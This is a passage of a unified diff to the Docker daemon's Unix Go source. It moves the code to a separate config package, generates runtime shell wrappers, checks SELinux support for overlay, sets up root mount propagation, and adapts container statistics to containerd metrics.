+	runtimeDir := filepath.Join(daemon.configStore.Root, "runtimes")
+	// Remove old temp directory if any
+	os.RemoveAll(runtimeDir + "-old")
+	tmpDir, err := ioutils.TempDir(daemon.configStore.Root, "gen-runtimes")
+	if err != nil {
+		return errors.Wrapf(err, "failed to get temp dir to generate runtime scripts")
 	}
+	defer func() {
+		if err != nil {
+			if err1 := os.RemoveAll(tmpDir); err1 != nil {
+				logrus.WithError(err1).WithField("dir", tmpDir).
+					Warnf("failed to remove tmp dir")
+			}
+			return
+		}
 
-	// Update attributes
-	var runtimeList bytes.Buffer
-	for name, rt := range daemon.configStore.Runtimes {
-		if runtimeList.Len() > 0 {
-			runtimeList.WriteRune(' ')
+		if err = os.Rename(runtimeDir, runtimeDir+"-old"); err != nil {
+			return
 		}
-		runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt))
-	}
+		if err = os.Rename(tmpDir, runtimeDir); err != nil {
+			err = errors.Wrapf(err, "failed to setup runtimes dir, new containers may not start")
+			return
+		}
+		if err = os.RemoveAll(runtimeDir + "-old"); err != nil {
+			logrus.WithError(err).WithField("dir", tmpDir).
+				Warnf("failed to remove old runtimes dir")
+		}
+	}()
 
-	return map[string]string{
-		"runtimes":        runtimeList.String(),
-		"default-runtime": daemon.configStore.DefaultRuntime,
+	for name, rt := range runtimes {
+		if len(rt.Args) == 0 {
+			continue
+		}
+
+		script := filepath.Join(tmpDir, name)
+		content := fmt.Sprintf("#!/bin/sh\n%s %s $@\n", rt.Path, strings.Join(rt.Args, " "))
+		if err := ioutil.WriteFile(script, []byte(content), 0700); err != nil {
+			return err
+		}
 	}
+	return nil
 }
 
 // verifyDaemonSettings performs validation of daemon config struct
-func verifyDaemonSettings(config *Config) error {
+func verifyDaemonSettings(conf *config.Config) error {
 	// Check for mutually incompatible config options
-	if config.bridgeConfig.Iface != "" && config.bridgeConfig.IP != "" {
+	if conf.BridgeConfig.Iface != "" && conf.BridgeConfig.IP != "" {
 		return fmt.Errorf("You specified -b & --bip, mutually exclusive options. Please specify only one")
 	}
-	if !config.bridgeConfig.EnableIPTables && !config.bridgeConfig.InterContainerCommunication {
+	if !conf.BridgeConfig.EnableIPTables && !conf.BridgeConfig.InterContainerCommunication {
 		return fmt.Errorf("You specified --iptables=false with --icc=false. ICC=false uses iptables to function. Please set --icc or --iptables to true")
 	}
-	if !config.bridgeConfig.EnableIPTables && config.bridgeConfig.EnableIPMasq {
-		config.bridgeConfig.EnableIPMasq = false
+	if !conf.BridgeConfig.EnableIPTables && conf.BridgeConfig.EnableIPMasq {
+		conf.BridgeConfig.EnableIPMasq = false
 	}
-	if err := VerifyCgroupDriver(config); err != nil {
+	if err := VerifyCgroupDriver(conf); err != nil {
 		return err
 	}
-	if config.CgroupParent != "" && UsingSystemd(config) {
-		if len(config.CgroupParent) <= 6 || !strings.HasSuffix(config.CgroupParent, ".slice") {
+	if conf.CgroupParent != "" && UsingSystemd(conf) {
+		if len(conf.CgroupParent) <= 6 || !strings.HasSuffix(conf.CgroupParent, ".slice") {
 			return fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"")
 		}
 	}
 
-	if config.DefaultRuntime == "" {
-		config.DefaultRuntime = stockRuntimeName
+	if conf.DefaultRuntime == "" {
+		conf.DefaultRuntime = config.StockRuntimeName
 	}
-	if config.Runtimes == nil {
-		config.Runtimes = make(map[string]types.Runtime)
+	if conf.Runtimes == nil {
+		conf.Runtimes = make(map[string]types.Runtime)
 	}
-	config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary}
+	conf.Runtimes[config.StockRuntimeName] = types.Runtime{Path: DefaultRuntimeName}
 
 	return nil
 }
@@ -625,7 +726,7 @@ func checkSystem() error {
 
 // configureMaxThreads sets the Go runtime max threads threshold
 // which is 90% of the kernel setting from /proc/sys/kernel/threads-max
-func configureMaxThreads(config *Config) error {
+func configureMaxThreads(config *config.Config) error {
 	mt, err := ioutil.ReadFile("/proc/sys/kernel/threads-max")
 	if err != nil {
 		return err
@@ -640,11 +741,56 @@ func configureMaxThreads(config *Config) error {
 	return nil
 }
 
+func overlaySupportsSelinux() (bool, error) {
+	f, err := os.Open("/proc/kallsyms")
+	if err != nil {
+		if os.IsNotExist(err) {
+			return false, nil
+		}
+		return false, err
+	}
+	defer f.Close()
+
+	var symAddr, symType, symName, text string
+
+	s := bufio.NewScanner(f)
+	for s.Scan() {
+		if err := s.Err(); err != nil {
+			return false, err
+		}
+
+		text = s.Text()
+		if _, err := fmt.Sscanf(text, "%s %s %s", &symAddr, &symType, &symName); err != nil {
+			return false, fmt.Errorf("Scanning '%s' failed: %s", text, err)
+		}
+
+		// Check for presence of symbol security_inode_copy_up.
+		if symName == "security_inode_copy_up" {
+			return true, nil
+		}
+	}
+	return false, nil
+}
+
 // configureKernelSecuritySupport configures and validates security support for the kernel
-func configureKernelSecuritySupport(config *Config, driverName string) error {
+func configureKernelSecuritySupport(config *config.Config, driverName string) error {
 	if config.EnableSelinuxSupport {
 		if !selinuxEnabled() {
 			logrus.Warn("Docker could not enable SELinux on the host system")
+			return nil
+		}
+
+		if driverName == "overlay" || driverName == "overlay2" {
+			// If driver is overlay or overlay2, make sure kernel
+			// supports selinux with overlay.
+			supported, err := overlaySupportsSelinux()
+			if err != nil {
+				return err
+			}
+
+			if !supported {
+				logrus.Warnf("SELinux is not supported with the %v graph driver on this kernel", driverName)
+			}
 		}
 	} else {
 		selinuxSetDisabled()
@@ -652,7 +798,7 @@ func configureKernelSecuritySupport(config *Config, driverName string) error {
 	return nil
 }
 
-func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
+func (daemon *Daemon) initNetworkController(config *config.Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
 	netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes)
 	if err != nil {
 		return nil, err
@@ -687,6 +833,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[
 		if err = n.Delete(); err != nil {
 			return nil, fmt.Errorf("could not delete the default bridge network: %v", err)
 		}
+		if len(config.NetworkConfig.DefaultAddressPools.Value()) > 0 && !daemon.configStore.LiveRestoreEnabled {
+			removeDefaultBridgeInterface()
+		}
 	}
 
 	if !config.DisableBridge {
@@ -701,12 +850,12 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[
 	return controller, nil
 }
 
-func driverOptions(config *Config) []nwconfig.Option {
+func driverOptions(config *config.Config) []nwconfig.Option {
 	bridgeConfig := options.Generic{
-		"EnableIPForwarding":  config.bridgeConfig.EnableIPForward,
-		"EnableIPTables":      config.bridgeConfig.EnableIPTables,
-		"EnableUserlandProxy": config.bridgeConfig.EnableUserlandProxy,
-		"UserlandProxyPath":   config.bridgeConfig.UserlandProxyPath}
+		"EnableIPForwarding":  config.BridgeConfig.EnableIPForward,
+		"EnableIPTables":      config.BridgeConfig.EnableIPTables,
+		"EnableUserlandProxy": config.BridgeConfig.EnableUserlandProxy,
+		"UserlandProxyPath":   config.BridgeConfig.UserlandProxyPath}
 	bridgeOption := options.Generic{netlabel.GenericData: bridgeConfig}
 
 	dOptions := []nwconfig.Option{}
@@ -714,22 +863,22 @@ func driverOptions(config *Config) []nwconfig.Option {
 	return dOptions
 }
 
-func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error {
+func initBridgeDriver(controller libnetwork.NetworkController, config *config.Config) error {
 	bridgeName := bridge.DefaultBridgeName
-	if config.bridgeConfig.Iface != "" {
-		bridgeName = config.bridgeConfig.Iface
+	if config.BridgeConfig.Iface != "" {
+		bridgeName = config.BridgeConfig.Iface
 	}
 	netOption := map[string]string{
 		bridge.BridgeName:         bridgeName,
 		bridge.DefaultBridge:      strconv.FormatBool(true),
 		netlabel.DriverMTU:        strconv.Itoa(config.Mtu),
-		bridge.EnableIPMasquerade: strconv.FormatBool(config.bridgeConfig.EnableIPMasq),
-		bridge.EnableICC:          strconv.FormatBool(config.bridgeConfig.InterContainerCommunication),
+		bridge.EnableIPMasquerade: strconv.FormatBool(config.BridgeConfig.EnableIPMasq),
+		bridge.EnableICC:          strconv.FormatBool(config.BridgeConfig.InterContainerCommunication),
 	}
 
 	// --ip processing
-	if config.bridgeConfig.DefaultIP != nil {
-		netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String()
+	if config.BridgeConfig.DefaultIP != nil {
+		netOption[bridge.DefaultBindingIP] = config.BridgeConfig.DefaultIP.String()
 	}
 
 	var (
@@ -745,8 +894,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e
 	}
 
 	nw := nwList[0]
-	if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" {
-		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
+	if len(nwList) > 1 && config.BridgeConfig.FixedCIDR != "" {
+		_, fCIDR, err := net.ParseCIDR(config.BridgeConfig.FixedCIDR)
 		if err != nil {
 			return errors.Wrap(err, "parse CIDR failed")
 		}
@@ -765,9 +914,9 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e
 		ipamV4Conf.Gateway = nw.IP.String()
 	}
 
-	if config.bridgeConfig.IP != "" {
-		ipamV4Conf.PreferredPool = config.bridgeConfig.IP
-		ip, _, err := net.ParseCIDR(config.bridgeConfig.IP)
+	if config.BridgeConfig.IP != "" {
+		ipamV4Conf.PreferredPool = config.BridgeConfig.IP
+		ip, _, err := net.ParseCIDR(config.BridgeConfig.IP)
 		if err != nil {
 			return err
 		}
@@ -776,8 +925,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e
 		logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool)
 	}
 
-	if config.bridgeConfig.FixedCIDR != "" {
-		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
+	if config.BridgeConfig.FixedCIDR != "" {
+		_, fCIDR, err := net.ParseCIDR(config.BridgeConfig.FixedCIDR)
 		if err != nil {
 			return err
 		}
@@ -785,13 +934,13 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e
 		ipamV4Conf.SubPool = fCIDR.String()
 	}
 
-	if config.bridgeConfig.DefaultGatewayIPv4 != nil {
-		ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String()
+	if config.BridgeConfig.DefaultGatewayIPv4 != nil {
+		ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.BridgeConfig.DefaultGatewayIPv4.String()
 	}
 
 	var deferIPv6Alloc bool
-	if config.bridgeConfig.FixedCIDRv6 != "" {
-		_, fCIDRv6, err := net.ParseCIDR(config.bridgeConfig.FixedCIDRv6)
+	if config.BridgeConfig.FixedCIDRv6 != "" {
+		_, fCIDRv6, err := net.ParseCIDR(config.BridgeConfig.FixedCIDRv6)
 		if err != nil {
 			return err
 		}
@@ -821,11 +970,11 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e
 		}
 	}
 
-	if config.bridgeConfig.DefaultGatewayIPv6 != nil {
+	if config.BridgeConfig.DefaultGatewayIPv6 != nil {
 		if ipamV6Conf == nil {
 			ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)}
 		}
-		ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.bridgeConfig.DefaultGatewayIPv6.String()
+		ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.BridgeConfig.DefaultGatewayIPv6.String()
 	}
 
 	v4Conf := []*libnetwork.IpamConf{ipamV4Conf}
@@ -835,7 +984,7 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e
 	}
 	// Initialize default network on "bridge" with the same name
 	_, err = controller.NewNetwork("bridge", "bridge", "",
-		libnetwork.NetworkOptionEnableIPv6(config.bridgeConfig.EnableIPv6),
+		libnetwork.NetworkOptionEnableIPv6(config.BridgeConfig.EnableIPv6),
 		libnetwork.NetworkOptionDriverOpts(netOption),
 		libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil),
 		libnetwork.NetworkOptionDeferIPv6Alloc(deferIPv6Alloc))
@@ -854,8 +1003,10 @@ func removeDefaultBridgeInterface() {
 	}
 }
 
-func (daemon *Daemon) getLayerInit() func(string) error {
-	return daemon.setupInitLayer
+func setupInitLayer(idMappings *idtools.IDMappings) func(containerfs.ContainerFS) error {
+	return func(initPath containerfs.ContainerFS) error {
+		return initlayer.Setup(initPath, idMappings.RootPair())
+	}
 }
 
 // Parse the remapped root (user namespace) option, which can be one of:
@@ -925,7 +1076,6 @@ func parseRemappedRoot(usergrp string) (string, string, error) {
 			if err != nil {
 				return "", "", fmt.Errorf("Error during gid lookup for %q: %v", lookupName, err)
 			}
-			groupID = group.Gid
 			groupname = group.Name
 		}
 	}
@@ -952,40 +1102,38 @@ func parseRemappedRoot(usergrp string) (string, string, error) {
 	return username, groupname, nil
 }
 
-func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) {
+func setupRemappedRoot(config *config.Config) (*idtools.IDMappings, error) {
 	if runtime.GOOS != "linux" && config.RemappedRoot != "" {
-		return nil, nil, fmt.Errorf("User namespaces are only supported on Linux")
+		return nil, fmt.Errorf("User namespaces are only supported on Linux")
 	}
 
 	// if the daemon was started with remapped root option, parse
 	// the config option to the int uid,gid values
-	var (
-		uidMaps, gidMaps []idtools.IDMap
-	)
 	if config.RemappedRoot != "" {
 		username, groupname, err := parseRemappedRoot(config.RemappedRoot)
 		if err != nil {
-			return nil, nil, err
+			return nil, err
 		}
 		if username == "root" {
 			// Cannot setup user namespaces with a 1-to-1 mapping; "--root=0:0" is a no-op
 			// effectively
 			logrus.Warn("User namespaces: root cannot be remapped with itself; user namespaces are OFF")
-			return uidMaps, gidMaps, nil
+			return &idtools.IDMappings{}, nil
 		}
 		logrus.Infof("User namespaces: ID ranges will be mapped to subuid/subgid ranges of: %s:%s", username, groupname)
 		// update remapped root setting now that we have resolved them to actual names
 		config.RemappedRoot = fmt.Sprintf("%s:%s", username, groupname)
 
-		uidMaps, gidMaps, err = idtools.CreateIDMappings(username, groupname)
+		mappings, err := idtools.NewIDMappings(username, groupname)
 		if err != nil {
-			return nil, nil, fmt.Errorf("Can't create ID mappings: %v", err)
+			return nil, errors.Wrapf(err, "Can't create ID mappings: %v")
 		}
+		return mappings, nil
 	}
-	return uidMaps, gidMaps, nil
+	return &idtools.IDMappings{}, nil
 }
 
-func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error {
+func setupDaemonRoot(config *config.Config, rootDir string, rootIDs idtools.IDPair) error {
 	config.Root = rootDir
 	// the docker root metadata directory needs to have execute permissions for all users (g+x,o+x)
 	// so that syscalls executing as non-root, operating on subdirectories of the graph root
@@ -1010,10 +1158,10 @@ func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error
 	// a new subdirectory with ownership set to the remapped uid/gid (so as to allow
 	// `chdir()` to work for containers namespaced to that uid/gid)
 	if config.RemappedRoot != "" {
-		config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootUID, rootGID))
+		config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootIDs.UID, rootIDs.GID))
 		logrus.Debugf("Creating user namespaced daemon root: %s", config.Root)
 		// Create the root directory if it doesn't exist
-		if err := idtools.MkdirAllAs(config.Root, 0700, rootUID, rootGID); err != nil {
+		if err := idtools.MkdirAllAndChown(config.Root, 0700, rootIDs); err != nil {
 			return fmt.Errorf("Cannot create daemon root: %s: %v", config.Root, err)
 		}
 		// we also need to verify that any pre-existing directories in the path to
@@ -1026,14 +1174,63 @@ func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error
 			if dirPath == "/" {
 				break
 			}
-			if !idtools.CanAccess(dirPath, rootUID, rootGID) {
-				return fmt.Errorf("A subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories.", config.Root)
+			if !idtools.CanAccess(dirPath, rootIDs) {
+				return fmt.Errorf("a subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories", config.Root)
 			}
 		}
 	}
+
+	if err := setupDaemonRootPropagation(config); err != nil {
+		logrus.WithError(err).WithField("dir", config.Root).Warn("Error while setting daemon root propagation, this is not generally critical but may cause some functionality to not work or fallback to less desirable behavior")
+	}
+	return nil
+}
+
+func setupDaemonRootPropagation(cfg *config.Config) error {
+	rootParentMount, options, err := getSourceMount(cfg.Root)
+	if err != nil {
+		return errors.Wrap(err, "error getting daemon root's parent mount")
+	}
+
+	var cleanupOldFile bool
+	cleanupFile := getUnmountOnShutdownPath(cfg)
+	defer func() {
+		if !cleanupOldFile {
+			return
+		}
+		if err := os.Remove(cleanupFile); err != nil && !os.IsNotExist(err) {
+			logrus.WithError(err).WithField("file", cleanupFile).Warn("could not clean up old root propagation unmount file")
+		}
+	}()
+
+	if hasMountinfoOption(options, sharedPropagationOption, slavePropagationOption) {
+		cleanupOldFile = true
+		return nil
+	}
+
+	if err := mount.MakeShared(cfg.Root); err != nil {
+		return errors.Wrap(err, "could not setup daemon root propagation to shared")
+	}
+
+	// check the case where this may have already been a mount to itself.
+	// If so then the daemon only performed a remount and should not try to unmount this later.
+	if rootParentMount == cfg.Root {
+		cleanupOldFile = true
+		return nil
+	}
+
+	if err := ioutil.WriteFile(cleanupFile, nil, 0600); err != nil {
+		return errors.Wrap(err, "error writing file to signal mount cleanup on shutdown")
+	}
 	return nil
 }
 
+// getUnmountOnShutdownPath generates the path to used when writing the file that signals to the daemon that on shutdown
+// the daemon root should be unmounted.
+func getUnmountOnShutdownPath(config *config.Config) string {
+	return filepath.Join(config.ExecRoot, "unmount-on-shutdown")
+}
+
 // registerLinks writes the links to a file.
 func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error {
 	if hostConfig == nil || hostConfig.NetworkMode.IsUserDefined() {
@@ -1041,19 +1238,19 @@ func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *
 	}
 
 	for _, l := range hostConfig.Links {
-		name, alias, err := runconfigopts.ParseLink(l)
+		name, alias, err := opts.ParseLink(l)
 		if err != nil {
 			return err
 		}
 		child, err := daemon.GetContainer(name)
 		if err != nil {
-			return fmt.Errorf("Could not get container for %s", name)
+			return errors.Wrapf(err, "could not get container for %s", name)
 		}
 		for child.HostConfig.NetworkMode.IsContainer() {
 			parts := strings.SplitN(string(child.HostConfig.NetworkMode), ":", 2)
 			child, err = daemon.GetContainer(parts[1])
 			if err != nil {
-				return fmt.Errorf("Could not get container for %s", parts[1])
+				return errors.Wrapf(err, "Could not get container for %s", parts[1])
 			}
 		}
 		if child.HostConfig.NetworkMode.IsHost() {
@@ -1066,7 +1263,8 @@ func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *
 
 	// After we load all the links into the daemon
 	// set them to nil on the hostconfig
-	return container.WriteHostConfig()
+	_, err := container.WriteHostConfig()
+	return err
 }
 
 // conditionalMountOnStart is a platform specific helper function during the
@@ -1081,63 +1279,123 @@ func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container
 	return daemon.Unmount(container)
 }
 
+func copyBlkioEntry(entries []*containerd_cgroups.BlkIOEntry) []types.BlkioStatEntry {
+	out := make([]types.BlkioStatEntry, len(entries))
+	for i, re := range entries {
+		out[i] = types.BlkioStatEntry{
+			Major: re.Major,
+			Minor: re.Minor,
+			Op:    re.Op,
+			Value: re.Value,
+		}
+	}
+	return out
+}
+
 func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) {
 	if !c.IsRunning() {
-		return nil, errNotRunning{c.ID}
+		return nil, errNotRunning(c.ID)
 	}
-	stats, err := daemon.containerd.Stats(c.ID)
+	cs, err := daemon.containerd.Stats(context.Background(), c.ID)
 	if err != nil {
+		if strings.Contains(err.Error(), "container not found") {
+			return nil, containerNotFound(c.ID)
+		}
 		return nil, err
 	}
 	s := &types.StatsJSON{}
-	cgs := stats.CgroupStats
-	if cgs != nil {
+	s.Read = cs.Read
+	stats := cs.Metrics
+	if stats.Blkio != nil {
 		s.BlkioStats = types.BlkioStats{
-			IoServiceBytesRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceBytesRecursive),
-			IoServicedRecursive:     copyBlkioEntry(cgs.BlkioStats.IoServicedRecursive),
-			IoQueuedRecursive:       copyBlkioEntry(cgs.BlkioStats.IoQueuedRecursive),
-			IoServiceTimeRecursive:  copyBlkioEntry(cgs.BlkioStats.IoServiceTimeRecursive),
-			IoWaitTimeRecursive:     copyBlkioEntry(cgs.BlkioStats.IoWaitTimeRecursive),
-			IoMergedRecursive:       copyBlkioEntry(cgs.BlkioStats.IoMergedRecursive),
-			IoTimeRecursive:         copyBlkioEntry(cgs.BlkioStats.IoTimeRecursive),
-			SectorsRecursive:        copyBlkioEntry(cgs.BlkioStats.SectorsRecursive),
-		}
-		cpu := cgs.CpuStats
+			IoServiceBytesRecursive: copyBlkioEntry(stats.Blkio.IoServiceBytesRecursive),
+			IoServicedRecursive:     copyBlkioEntry(stats.Blkio.IoServicedRecursive),
+			IoQueuedRecursive:       copyBlkioEntry(stats.Blkio.IoQueuedRecursive),
+			IoServiceTimeRecursive:  copyBlkioEntry(stats.Blkio.IoServiceTimeRecursive),
+			IoWaitTimeRecursive:     copyBlkioEntry(stats.Blkio.IoWaitTimeRecursive),
+			IoMergedRecursive:       copyBlkioEntry(stats.Blkio.IoMergedRecursive),
+			IoTimeRecursive:         copyBlkioEntry(stats.Blkio.IoTimeRecursive),
+			SectorsRecursive:        copyBlkioEntry(stats.Blkio.SectorsRecursive),
+		}
+	}
+	if stats.CPU != nil {
 		s.CPUStats = types.CPUStats{
 			CPUUsage: types.CPUUsage{
-				TotalUsage:        cpu.CpuUsage.TotalUsage,
-				PercpuUsage:       cpu.CpuUsage.PercpuUsage,
-				UsageInKernelmode: cpu.CpuUsage.UsageInKernelmode,
-				UsageInUsermode:   cpu.CpuUsage.UsageInUsermode,
+				TotalUsage:        stats.CPU.Usage.Total,
+				PercpuUsage:       stats.CPU.Usage.PerCPU,
+				UsageInKernelmode: stats.CPU.Usage.Kernel,
+				UsageInUsermode:   stats.CPU.Usage.User,
 			},
 			ThrottlingData: types.ThrottlingData{
-				Periods:          cpu.ThrottlingData.Periods,
-				ThrottledPeriods: cpu.ThrottlingData.ThrottledPeriods,
-				ThrottledTime:    cpu.ThrottlingData.ThrottledTime,
+				Periods:          stats.CPU.Throttling.Periods,
+				ThrottledPeriods: stats.CPU.Throttling.ThrottledPeriods,
+				ThrottledTime:    stats.CPU.Throttling.ThrottledTime,
 			},
 		}
-		mem := cgs.MemoryStats.Usage
-		s.MemoryStats = types.MemoryStats{
-			Usage:    mem.Usage,
-			MaxUsage: mem.MaxUsage,
-			Stats:    cgs.MemoryStats.Stats,
-			Failcnt:  mem.Failcnt,
-			Limit:    mem.Limit,
+	}
+
+	if stats.Memory != nil {
+		raw := make(map[string]uint64)
+		raw["cache"] = stats.Memory.Cache
+		raw["rss"] = stats.Memory.RSS
+		raw["rss_huge"] = stats.Memory.RSSHuge
+		raw["mapped_file"] = stats.Memory.MappedFile
+		raw["dirty"] = stats.Memory.Dirty
+		raw["writeback"] = stats.Memory.Writeback
+		raw["pgpgin"] = stats.Memory.PgPgIn
+		raw["pgpgout"] = stats.Memory.PgPgOut
+		raw["pgfault"] = stats.Memory.PgFault
+		raw["pgmajfault"] = stats.Memory.PgMajFault
+		raw["inactive_anon"] = stats.Memory.InactiveAnon
+		raw["active_anon"] = stats.Memory.ActiveAnon
+		raw["inactive_file"] = stats.Memory.InactiveFile
+		raw["active_file"] = stats.Memory.ActiveFile
+		raw["unevictable"] = stats.Memory.Unevictable
+		raw["hierarchical_memory_limit"] = stats.Memory.HierarchicalMemoryLimit
+		raw["hierarchical_memsw_limit"] = stats.Memory.HierarchicalSwapLimit
+		raw["total_cache"] = stats.Memory.TotalCache
+		raw["total_rss"] = stats.Memory.TotalRSS
+		raw["total_rss_huge"] = stats.Memory.TotalRSSHuge
+		raw["total_mapped_file"] = stats.Memory.TotalMappedFile
+		raw["total_dirty"] = stats.Memory.TotalDirty
+		raw["total_writeback"] = stats.Memory.TotalWriteback
+		raw["total_pgpgin"] = stats.Memory.TotalPgPgIn
+		raw["total_pgpgout"] = stats.Memory.TotalPgPgOut
+		raw["total_pgfault"] = stats.Memory.TotalPgFault
+		raw["total_pgmajfault"] = stats.Memory.TotalPgMajFault
+		raw["total_inactive_anon"] = stats.Memory.TotalInactiveAnon
+		raw["total_active_anon"] = stats.Memory.TotalActiveAnon
+		raw["total_inactive_file"] = stats.Memory.TotalInactiveFile
+		raw["total_active_file"] = stats.Memory.TotalActiveFile
+		raw["total_unevictable"] = stats.Memory.TotalUnevictable
+
+		if stats.Memory.Usage != nil {
+			s.MemoryStats = types.MemoryStats{
+				Stats:    raw,
+				Usage:    stats.Memory.Usage.Usage,
+				MaxUsage: stats.Memory.Usage.Max,
+				Limit:    stats.Memory.Usage.Limit,
+				Failcnt:  stats.Memory.Usage.Failcnt,
+			}
+		} else {
+			s.MemoryStats = types.MemoryStats{
+				Stats: raw,
+			}
 		}
+
 		// if the container does not set memory limit, use the machineMemory
-		if mem.Limit > daemon.statsCollector.machineMemory && daemon.statsCollector.machineMemory > 0 {
-			s.MemoryStats.Limit = daemon.statsCollector.machineMemory
-		}
-		if cgs.PidsStats != nil {
-			s.PidsStats = types.PidsStats{
-				Current: cgs.PidsStats.Current,
-			}
+		if s.MemoryStats.Limit > daemon.machineMemory && daemon.machineMemory > 0 {
+			s.MemoryStats.Limit = daemon.machineMemory
 		}
 	}
-	s.Read, err = ptypes.Timestamp(stats.Timestamp)
-	if err != nil {
-		return nil, err
+
+	if stats.Pids != nil {
+		s.PidsStats = types.PidsStats{
+			Current: stats.Pids.Current,
+			Limit:   stats.Pids.Limit,
+		}
 	}
+
 	return s, nil
 }
 
@@ -1147,21 +1405,45 @@ func (daemon *Daemon) setDefaultIsolation() error {
 	return nil
 }
 
-func rootFSToAPIType(rootfs *image.RootFS) types.RootFS {
-	var layers []string
-	for _, l := range rootfs.DiffIDs {
-		layers = append(layers, l.String())
+// setupDaemonProcess sets various settings for the daemon's process
+func setupDaemonProcess(config *config.Config) error {
+	// setup the daemons oom_score_adj
+	if err := setupOOMScoreAdj(config.OOMScoreAdjust); err != nil {
+		return err
 	}
-	return types.RootFS{
-		Type:   rootfs.Type,
-		Layers: layers,
+	if err := setMayDetachMounts(); err != nil {
+		logrus.WithError(err).Warn("Could not set may_detach_mounts kernel parameter")
 	}
+	return nil
 }
 
-// setupDaemonProcess sets various settings for the daemon's process
-func setupDaemonProcess(config *Config) error {
-	// setup the daemons oom_score_adj
-	return setupOOMScoreAdj(config.OOMScoreAdjust)
+// This is used to allow removal of mountpoints that may be mounted in other
+// namespaces on RHEL based kernels starting from RHEL 7.4.
+// Without this setting, removals on these RHEL based kernels may fail with
+// "device or resource busy".
+// This setting is not available in upstream kernels as it is not configurable,
+// but has been in the upstream kernels since 3.15.
+func setMayDetachMounts() error {
+	f, err := os.OpenFile("/proc/sys/fs/may_detach_mounts", os.O_WRONLY, 0)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return errors.Wrap(err, "error opening may_detach_mounts kernel config file")
+	}
+	defer f.Close()
+
+	_, err = f.WriteString("1")
+	if os.IsPermission(err) {
+		// Setting may_detach_mounts does not work in an
+		// unprivileged container. Ignore the error, but log
+		// it if we appear not to be in that situation.
+		if !rsystem.RunningInUserNS() {
+			logrus.Debugf("Permission denied writing %q to /proc/sys/fs/may_detach_mounts", "1")
+		}
+		return nil
+	}
+	return err
 }
 
 func setupOOMScoreAdj(score int) error {
@@ -1169,7 +1451,7 @@ func setupOOMScoreAdj(score int) error {
 	if err != nil {
 		return err
 	}
-
+	defer f.Close()
 	stringScore := strconv.Itoa(score)
 	_, err = f.WriteString(stringScore)
 	if os.IsPermission(err) {
@@ -1181,7 +1463,7 @@ func setupOOMScoreAdj(score int) error {
 		}
 		return nil
 	}
-	f.Close()
+
 	return err
 }
 
@@ -1198,26 +1480,30 @@ func (daemon *Daemon) initCgroupsPath(path string) error {
 	// for the period and runtime as this limits what the children can be set to.
 	daemon.initCgroupsPath(filepath.Dir(path))
 
-	_, root, err := cgroups.FindCgroupMountpointAndRoot("cpu")
+	mnt, root, err := cgroups.FindCgroupMountpointAndRoot("cpu")
 	if err != nil {
 		return err
 	}
+	// When docker is run inside docker, the root is based of the host cgroup.
+	// Should this be handled in runc/libcontainer/cgroups ?
+	if strings.HasPrefix(root, "/docker/") {
+		root = "/"
+	}
 
-	path = filepath.Join(root, path)
+	path = filepath.Join(mnt, root, path)
 	sysinfo := sysinfo.New(true)
-	if sysinfo.CPURealtimePeriod && daemon.configStore.CPURealtimePeriod != 0 {
-		if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) {
-			return err
-		}
-		if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_period_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimePeriod, 10)), 0700); err != nil {
-			return err
-		}
+	if err := maybeCreateCPURealTimeFile(sysinfo.CPURealtimePeriod, daemon.configStore.CPURealtimePeriod, "cpu.rt_period_us", path); err != nil {
+		return err
 	}
-	if sysinfo.CPURealtimeRuntime && daemon.configStore.CPURealtimeRuntime != 0 {
-		if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) {
